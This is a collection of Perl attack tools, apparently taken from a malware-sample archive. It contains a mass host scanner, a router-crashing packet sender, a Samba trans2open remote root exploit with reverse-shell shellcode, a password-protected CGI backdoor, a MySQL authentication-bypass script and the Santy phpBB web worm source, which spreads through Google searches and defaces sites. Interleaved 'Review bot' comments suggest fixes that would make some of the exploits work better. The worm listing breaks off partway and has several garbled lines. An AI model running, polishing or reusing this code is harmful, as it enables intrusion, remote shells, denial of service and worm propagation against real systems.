# print "Would you like normal or deep scan?\n [Normal-1, Deep-2, or Quit-3]:";
# $n=0;
# chomp($type=<STDIN>);
# Note if above is unhashed these two lines must be hashed.
$n=0;
$type=1;
if($type eq 3)
{ print "Scan aborted!\n"; exit; }
if($type eq 1)
{
foreach $scripts_w(@scripts_w)
{
print "Searching for @names_w[$n] : ";
$scw=$scripts_w;
$name = @names_w[$n];
&win_scan;
$n++;
}
}
else {
foreach $scripts_u(@scripts_u)
{
print "Searching for [@names_u[$n]] : ";
$sc=$scripts_u;
$name = @names_u[$n];
&win2_scan;
$n++;
}
}
close(SOCK);
}
#################################################################
sub win_scan {
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
connect(SOCK, $paddr) || &error("Unable to connect: $!");
send(SOCK,$scw,0);
$check=<SOCK>;
($http,$code,$blah) = split(/ /,$check);
if($code == 200)
{
print "[Found!]\n";
open (OUT, ">>$ARGV[1]");
print OUT ("$server - [@names_w[$n]] \n");
close (OUT);
$insecure++;
}
else
{
print "[Not Found]\n";
}
close(SOCK);
}
###############################################################
sub win2_scan {
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
connect(SOCK, $paddr) || &error("Unable to connect: $!");
send(SOCK,$sc,0);
$check=<SOCK>;
($http,$code,$blah) = split(/ /,$check);
if($code == 200)
{
print "[Found!]\n";
$insecure++;
}
else
{
print "[Not Found]\n";
}
close(SOCK);
}
################################ USAGE ##########################
sub usage {
system "clear";
print "\n\n\n Fast Scanner \n\n";
print " || by Energy || \n\n";
print "Used to mass scan Windows,IRIX and Linux b0x\n\n";
print "Usage: perl usdl.pl hostlist.txt logfile.txt [porta]\n\n";
exit(0); }
################################ END ##########################
print "[Test $size hosts $port e $insecure sites vulnerable]\n";


@ -0,0 +1,57 @@
#
# Ascend Kill II - perl version
# (C) 1998 Rootshell - http://www.rootshell.com/ - <info@rootshell.com>
#
# Released: 3/17/98
#
# Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues
# (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
#
# NOTE: This program is NOT to be used for malicous purposes. This is
# intenteded for educational purposes only. By using this program
# you agree to use this for lawfull purposes ONLY.
#
#
use Socket;
require "getopts.pl";
sub AF_INET {2;}
sub SOCK_DGRAM {2;}
sub ascend_kill {
$remotehost = shift(@_);
chop($hostname = `hostname`);
$port = 9;
$SIG{'INT'} = 'dokill';
$sockaddr = 'S n a4 x8';
($pname, $aliases, $proto) = getprotobyname('tcp');
($pname, $aliases, $port) = getservbyname($port, 'tcp')
unless $port =~ /^\d+$/;
($pname, $aliases, $ptype, $len, $thisaddr) =
gethostbyname($hostname);
$this = pack($sockaddr, AF_INET, 0, $thisaddr);
($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost);
$that = pack($sockaddr, AF_INET, $port, $thataddr);
socket(S, &AF_INET, &SOCK_DGRAM, 0);
$msg = pack("c64",
0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
0x50, 0x41, 0x53, 0x53);
for ($i=0; $i<500; $i++) {
$msg .= pack("c1", 0xff);
}
send(S,$msg,0,$that) || die "send:$!";
}
if ($ARGV[0] eq '') {
print "usage: akill2.pl <remote_host>\n";
exit;
}
&ascend_kill($ARGV[0]);
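Review bot: `$SIG{'INT'} = 'dokill';` at the top of ascend_kill names a handler subroutine that is defined nowhere in the file, so an interrupt during the send produces a "SIG INT handler 'dokill' not defined" warning instead of whatever cleanup was intended; either define it or write `$SIG{INT} = sub { exit };`. The `getprotobyname('tcp')` lookup is inconsistent with the SOCK_DGRAM socket opened a few lines later, and its result `$proto` is never used, so the line is dead. The local `sub AF_INET {2;}` and `sub SOCK_DGRAM {2;}` silently shadow the constants already exported by `use Socket`, which deserves a comment since they are only right on platforms where both values happen to be 2.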


@ -0,0 +1,492 @@
###############
##[ Header
# Name: trans2root.pl
# Purpose: Proof of concept exploit for Samba 2.2.x (trans2open overflow)
# CVE: CAN-2003-0201
# Author: H D Moore <hdmoore@digitaldefense.net>
# Copyright: Copyright (C) 2003 Digital Defense Inc.
# Release Date: April 7, 2003
# Revision: 1.0
# Download: http://www.digitaldefense.net/labs/securitytools.html
# Modified: By SARA team to incorporate for sara
##
use strict;
use Socket;
use IO::Socket;
use IO::Select;
use POSIX;
use Getopt::Std;
$SIG{USR2} = \&GoAway;
my %args;
my %targets =
(
"linx86" => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86],
"solx86" => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86],
"fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86],
# name # default # start # end # step # function
);
getopt('t:M:h:p:r:x:H:P:', \%args);
my $target_type = $args{t} || Usage();
my $target_host = $args{h} || Usage();
my $local_host = $args{H} || Usage();
my $local_port = $args{P} || 1981;
my $target_port = $args{p} || 139;
my $mode = $args{x} || "";
my $target_mode = "brute";
if (! exists($targets{$target_type})) { Usage(); }
print "[*] Using target type: $target_type\n";
# allow single mode via the -M option
if ($args{M} && uc($args{M}) eq "S")
{
$target_mode = "single";
}
# the parent process listens for an incoming connection
# the child process handles the actual exploitation
my $listen_pid = $$;
my $exploit_pid = StartListener($local_port);
# get the default return address for single mode
my $targ_ret = $args{r} || $targets{$target_type}->[0];
my $curr_ret;
$targ_ret = eval($targ_ret);
if ($target_mode !~ /brute|single/)
{
print "[*] Invalid attack mode: $target_mode (single or brute only)\n";
exit(0);
}
if ($target_mode eq "single")
{
$curr_ret = $targ_ret;
if(! $targ_ret)
{
print "[*] Invalid return address specified!\n";
kill("USR2", $listen_pid);
exit(0);
}
print "[*] Starting single shot mode...\n";
printf ("[*] Using return address of 0x%.8x\n", $targ_ret);
my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret);
my $ret = AttemptExploit($target_host, $target_port, $buf);
sleep(2);
kill("USR2", $listen_pid);
exit(0);
}
if ($target_mode eq "brute")
{
print "[*] Starting brute force mode...\n";
for (
$curr_ret =$targets{$target_type}->[1];
$curr_ret >= $targets{$target_type}->[2];
$curr_ret -=$targets{$target_type}->[3]
)
{
select(STDOUT); $|++;
my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret);
printf (" \r[*] Return Address: 0x%.8x", $curr_ret);
my $ret = AttemptExploit($target_host, $target_port, $buf);
}
sleep(2);
kill("USR2", $listen_pid);
exit(0);
}
sub Usage {
print STDERR "\n";
print STDERR " trans2root.pl - Samba 2.2.x 'trans2open()' Remote Exploit\n";
print STDERR "===========================================================\n\n";
print STDERR " Usage: \n";
print STDERR " $0 <options> -t <target type> -H <your ip> -h <target ip>\n";
print STDERR " Options: \n";
print STDERR " -M (S|B) <single or brute mode>\n";
print STDERR " -r <return address for single mode>\n";
print STDERR " -p <alternate Samba port>\n";
print STDERR " -P <alternate listener port>\n";
print STDERR " Targets:\n";
foreach my $type (keys(%targets))
{
print STDERR " $type\n";
}
print STDERR "\n";
exit(1);
}
sub StartListener {
my ($local_port) = @_;
my $listen_pid = $$;
my $s = IO::Socket::INET->new (
Proto => "tcp",
LocalPort => $local_port,
Type => SOCK_STREAM,
Listen => 3,
ReuseAddr => 1
);
if (! $s)
{
print "[*] Could not start listener: $!\n";
exit(0);
}
print "[*] Listener started on port $local_port\n";
my $exploit_pid = fork();
if ($exploit_pid)
{
my $victim;
$SIG{USR2} = \&GoAway;
while ($victim = $s->accept())
{
kill("USR2", $exploit_pid);
if ($mode eq "Sara") {
print STDOUT "\n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "\n\n";
StartShell($victim);
} else {
print "System is vulnerable to attack\n";
exit(0);
}
}
exit(0);
}
return ($exploit_pid);
}
sub StartShell {
my ($client) = @_;
my $sel = IO::Select->new();
Unblock(*STDIN);
Unblock(*STDOUT);
Unblock($client);
select($client); $|++;
select(STDIN); $|++;
select(STDOUT); $|++;
$sel->add($client);
$sel->add(*STDIN);
print $client "echo \\-\\-\\=\\[ Welcome to `hostname` \\(`id`\\)\n";
print $client "echo \n";
while (fileno($client))
{
my $fd;
my @fds = $sel->can_read(0.2);
foreach $fd (@fds)
{
my @in = <$fd>;
if(! scalar(@in)) { next; }
if (! $fd || ! $client)
{
print "[*] Closing connection.\n";
close($client);
exit(0);
}
if ($fd eq $client)
{
print STDOUT join("", @in);
} else {
print $client join("", @in);
}
}
}
close ($client);
}
sub AttemptExploit {
my ($Host, $Port, $Exploit) = @_;
my $res;
my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port, Type => SOCK_STREAM, Protocol => "tcp");
if (! $s)
{
print "\n[*] Error: could not connect: $!\n";
kill("USR2", $listen_pid);
exit(0);
}
select($s); $|++;
select(STDOUT); $|++;
Unblock($s);
my $SetupSession =
"\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x08".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01".
"\x00\x00\x00\x00";
my $TreeConnect =
"\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00".
"\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24".
"\x25\x6e\x6f\x62\x6f\x64\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50".
"\x43\x24";
my $Flush = ("\x00" x 808);
print $s $SetupSession;
$res = ReadResponse($s);
print $s $TreeConnect;
$res = ReadResponse($s);
# uncomment this for diagnostics
# print "[*] Press Enter to Continue...\n";
# $res = <STDIN>;
print "[*] Sending Exploit Buffer...\n";
print $s $Exploit;
print $s $Flush;
ReadResponse($s);
close($s);
}
sub CreateBuffer_linx86 {
my ($Host, $Port, $Return) = @_;
my $RetAddr = eval($Return);
$RetAddr = pack("l", $RetAddr);
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the trans2open overflow
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
GetNops(772) .
# xor decoder courtesy of hsj
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
"\x93\x40\xe2\xfa".
# reverse-connect, mangled lamagra code + fixes
"\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b".
"\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a".
"\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d".
$p1.$p2 ."\x54\xd6\x63". $a1.$a2.$a3.$a4.
"\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67".
"\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e".
"\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b".
"\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60".
"\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa".
"\xfd\xbc\xe0\xfb".
GetNops(87).
($RetAddr x 8).
"DDI!". ("\x00" x 277);
return $exploit;
}
sub CreateBuffer_solx86 {
my ($Host, $Port, $Return) = @_;
my $RetAddr = eval($Return);
my $IckAddr = $RetAddr - 512;
$RetAddr = pack("l", $RetAddr);
$IckAddr = pack("l", $IckAddr);
# IckAddr needs to point to a writable piece of memory
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the trans2open overflow
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
GetNops(813) .
# xor decoder courtesy of hsj
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
"\x93\x40\xe2\xfa".
# reverse-connect, code by bighawk
"\x2b\x6c\x6b\x6c\xaf\x64\x43\xc3\xa2\x53\x23\x09\xc3\x1a\x76\xa2".
"\x5a\xc2\xd2\xd2\xc2\xc2\x23\x75\x6c\x46\xa2\x41\x1a\x54\xfb".
$a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
"\xf5\xc2\x1a\x75\xf9\x83\xc5\xc4\x23\x78\x6c\x46\xa2\x41\x21\x9a".
"\xc2\xc1\xc4\x23\xad\x6c\x46\xda\xea\x61\xc3\xfb\xbc\xbc\xe0\xfb".
"\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc3\xc0\x1a\x71\xc3\xc1\xc0\x23\xa8".
"\x6c\x46".
GetNops(87) .
"010101".
$RetAddr.
$IckAddr.
$RetAddr.
$IckAddr.
"101010".
"DDI!". ("\x00" x 277);
return $exploit;
}
sub CreateBuffer_bsdx86 {
my ($Host, $Port, $Return) = @_;
my $RetAddr = eval($Return);
my $IckAddr = $RetAddr - 512;
$RetAddr = pack("l", $RetAddr);
$IckAddr = pack("l", $IckAddr);
# IckAddr needs to point to a writable piece of memory
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the trans2open overflow
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
GetNops(830) .
# xor decoder courtesy of hsj
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
"\x93\x40\xe2\xfa".
# reverse-connect, code by bighawk
"\xa2\x5a\x64\x72\xc2\xd2\xc2\xd2\xc2\xc2\x23\xf2\x5e\x13\x1a\x50".
"\xfb". $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
"\xf5\xc2\x1a\x75\x21\x83\xc1\xc5\xc3\xc3\x23\xf1\x5e\x13\xd2\x23".
"\xc9\xda\xc2\xc0\xc0\x5e\x13\xd2\x71\x66\xc2\xfb\xbc\xbc\xe0\xfb".
"\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc2\xc7\xc0\xc0\x23\xa8\x5e\x13".
GetNops(87) .
"010101".
$RetAddr.
$IckAddr.
$RetAddr.
$IckAddr.
"101010".
"DDI!". ("\x00" x 277);
return $exploit;
}
sub Unblock {
my $fd = shift;
my $flags;
$flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
}
sub GoAway {
exit(0);
}
sub ReadResponse {
my ($s) = @_;
my $sel = IO::Select->new($s);
my $res;
my @fds = $sel->can_read(4);
foreach (@fds) { $res .= <$s>; }
return $res;
}
sub HexDump {
my ($data) = @_;
my @x = split(//, $data);
my $cnt = 0;
foreach my $h (@x)
{
if ($cnt > 16)
{
print "\n";
$cnt = 0;
}
printf("\\x%.2x", ord($h));
$cnt++;
}
print "\n";
}
# thank you k2 ;)
sub GetNops {
my ($cnt) = @_;
my @nops = split(//,"\x99\x96\x97\x95\x93\x91\x90\x4d\x48\x47\x4f\x40\x41\x37\x3f\x97".
"\x46\x4e\xf8\x92\xfc\x98\x27\x2f\x9f\xf9\x4a\x44\x42\x43\x49\x4b".
"\xf5\x45\x4c");
return join ("", @nops[ map { rand @nops } ( 1 .. $cnt )]);
}
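Review bot: HexDump's wrap check `if ($cnt > 16)` lets 17 bytes print before each newline, so the rows are uneven; `if ($cnt >= 16)` gives the intended 16-byte rows (HexDump is never called in this file, so it appears to be leftover debugging output). The `$target_mode !~ /brute|single/` guard near the top can never fire, because `$target_mode` is only ever assigned "brute" or "single" by the script itself. The `-r` argument is passed through a string `eval` both at the top level and again inside each CreateBuffer_* routine; a comment stating that this is what lets the option accept `0x…` literals (and therefore any Perl expression) would help the next reader.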

48
Perl/HackTool.Perl.Ulgin Normal file

@ -0,0 +1,48 @@
# jerusalem (c) 2001
# heavily untested and on_the_fly done cgi (i've written this code on my
# organizer) - jerusalem@digitalmaphia.com / j3rus4lem@users.sourceforge.net
$password = "phj34r"; # as usual
## -note
## if you don't want to show your password in clear (in the sourcecode)
## use perl's crypt() function. a bogus example of this can be found
## into http://sgxxx.net/users/jerusalem/ulogin.pl *subliminal message*
use CGI qw/:standard/;
print header,
start_html('cgi backdoor - jerusalem\@digitalmaphia.com 2001'),
h1('cgi backdoor - jerusalem\@digitalmaphia.com 2001'),
start_form,
"password: ",password_field('pass'),p,
"port: ",textfield('port'),
# if you want your pass shown in clear just subst the password_field() function
# with a textfield() one
submit,
end_form,
hr;
if (param()) {
$pass = "<EM>"."$password"."</EM>";
if (em(param('pass')) eq $pass) { werk(); }
else { stfu(); }
sub stfu { print "password incorrect. sorry.\n"; }
hr;
}
# This subroutine is a little and bogus example of what you can do
# using a perl cgi. In this case, a daemon like the unix' echo is
# started and forked under a pid.
sub werk {
$aaa = em(param('port'));
$aaa =~ s/<.*?>//g;
my $pid = fork(); if ($pid) { exit(); }
yeha();
sub yeha {
use IO::Socket;
my $port = $aaa;
my $socket = IO::Socket::INET->new(Listen => 5,
LocalPort => $port,
Proto => 'tcp',
Reuse => 1);
while ($new = $socket->accept()) { $new->autoflush(1); command(); }
sub command { while (<$new>) { $comm = $_; chomp $comm;
print $new "$comm\n";
command(); } }
}
}
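Review bot: `sub command` calls itself from inside its own `while (<$new>)` loop, so every line read on the accepted connection adds a stack frame that is only released when the peer disconnects; the recursive `command();` call inside the loop is redundant with the loop itself. The named subs `yeha` and `command` are written nested inside `sub werk`, which is misleading: Perl named subs are always package-level regardless of where they appear, and the globals `$aaa` and `$new` are what actually carry state between them, so the nesting buys nothing and a comment saying so (or moving the subs to top level) would make the control flow readable.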


@ -0,0 +1,139 @@
#
# The script connects to MySQL and attempts to log in using a zero-length password
# Based on the vuln found by NGSSecurity
#
# The following Perl script can be used to test your version of MySQL. It will display
# the login packet sent to the server and it's reply.
#
# Exploit copyright (c) 2004 by Eli Kara, Beyond Security
# elik beyondsecurity com
#
use strict;
use IO::Socket::INET;
usage() unless ((@ARGV >= 1) || (@ARGV <= 3));
my $username = shift(@ARGV);
my $host = shift(@ARGV);
if (!$host)
{
usage();
}
my $port = shift(@ARGV);
if (!$port)
{
$port = 3306; print "Using default MySQL port (3306)\n";
}
# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
# receive greeting
my $reply;
recv($socket, $reply, 1024, 0);
if (length($reply) < 7)
{
print "Not allowed to connect to MySQL!\n";
exit(1);
}
print "Received greeting:\n";
HexDump($reply);
print "\n";
# here we define the login OK reply
# my $login_ok = "\x01\x00\x00\x02\xFE";
# break the username string into chars and rebuild it
my $binuser = pack("C*", unpack("C*", $username));
# send login caps packet with password
my $packet = "\x85\xa6".
"\x03\x00\x00".
"\x00".
"\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc..
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash
substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1)
print "Sending caps packet:\n";
HexDump($packet);
print "\n";
send $socket, $packet, 0;
# receive reply
recv($socket, $reply, 1024, 0);
print "Received reply:\n";
HexDump($reply);
my @list_bytes = unpack("C*", $reply);
#print "The fifth byte is: ", $list_bytes[4], "\n";
if (length(@list_bytes) >= 4)
{
print "Response insufficent\n";
}
#if ($reply eq $login_ok)
if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
{
print "Received OK reply, authentication successful!!\n";
}
else
{
print "Authentication failed!\n";
}
# close
close($socket);
sub usage
{
# print usage information
print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n
<username> - The DB username to authenticate as
<host> - The host to connect to
[port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n";
exit(1);
}
###
# do a hexdump of a string (assuming it's binary)
###
sub HexDump
{
my $buffer = $_[0];
# unpack it into chars
my @up = unpack("C*", $buffer);
my $pos=0;
# calculate matrix sizes
my $rows = int(@up/16);
my $leftover = int(@up%16);
for( my $row=0; $row < $rows; $row++, $pos+=16)
{
printf("%08X\t", $pos);
my @values = @up[$pos .. $pos+15];
my @line;
foreach my $val (@values)
{
push(@line, sprintf("%02X", $val));
}
print join(' ', @line), "\n";
}
# print last line
printf("%08X\t", $pos);
my @values = @up[$pos .. $pos+$leftover-1];
my @line;
foreach my $val (@values)
{
push(@line, sprintf("%02X", $val));
}
print join(' ', @line), "\n";
}
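Review bot: The argument check `usage() unless ((@ARGV >= 1) || (@ARGV <= 3));` is always true, since any element count satisfies one of the two sides, so usage() is never reached from it; `usage() unless (@ARGV >= 2 && @ARGV <= 3);` matches the usage text (username and host required, port optional). Later, `if (length(@list_bytes) >= 4)` takes `length` of the array's element count rendered as a string rather than the count itself, and the "Response insufficent" branch does not exit, so the code falls through to `$list_bytes[4]`; because `undef == 0` is true in Perl, a short or empty reply then prints the "authentication successful" message. `if (@list_bytes < 5) { print "Response insufficient\n"; exit(1); }` is what the comment describes and removes that false positive.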

212
Perl/Net-Worm.Perl.Santy.c Normal file

@ -0,0 +1,212 @@
#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
# -SECU For educational purpose
#
# See : http://isc.sans.org/diary.php?date=2004-12-21
# http://www.f-secure.com/v-descs/santy_a.shtml
#
use
strict;
use Socket;
sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();
sub GrabURL($);
sub str2chr($);
eval{ fork and exit; };
my $generation = x;
PayLoad() if $generation > 3;
open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;
while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}
$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;
my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';
while(1) {
exit if -e 'stop.it';
OUTER: for my $url (GoGoogle()) {
exit if -e 'stop.it';
$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;
while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName) . ',' . str2chr('a') . '),
' . str2chr($1) . '),exit%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $portion;
next OUTER unless GrabURL($url);
}
my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) . ')%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $syst;
GrabURL($url);
}
}
sub str2chr($) {
my $s = shift;
$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg;
$s =~ s/%252e$//;
return $s;
}
sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' . '&
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000)) .
'%22&btnG=Search';
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif width=16 height=26
alt="" border=0><br>\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}
return @urls;
}
sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;
my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);
my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";
my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}
my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);
connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;
my $answer = join '', <Server>;
close (Server);
return $answer;
}
sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};
unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}
sub DoDir($) {
my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;
